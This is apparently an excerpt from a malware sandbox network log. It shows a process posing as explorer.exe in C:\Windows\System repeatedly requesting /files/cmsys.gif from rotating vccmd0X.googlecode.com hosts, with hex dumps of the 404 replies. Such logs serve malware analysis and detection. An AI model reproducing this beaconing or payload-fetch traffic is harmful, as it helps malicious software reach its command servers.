                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:41.682733059 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    78192.168.2.560730108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:42.043884039 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:42.952661037 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:42 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:42.952675104 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    79192.168.2.560731142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:43.320086956 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.287118912 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:44 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.287287951 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    80192.168.2.56073364.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:46.555582047 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:47.505816936 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:47 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:47.506161928 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    81192.168.2.560734108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:47.796137094 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:48.744771004 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:48 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:48.744801044 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    82192.168.2.560735142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:49.031251907 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:49.962517023 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:49 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:49.962536097 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    83192.168.2.56073764.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:51.835380077 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:52.786037922 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:52 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:52.786211014 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    84192.168.2.560738108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:53.243544102 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:54.177103996 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:54 GMT
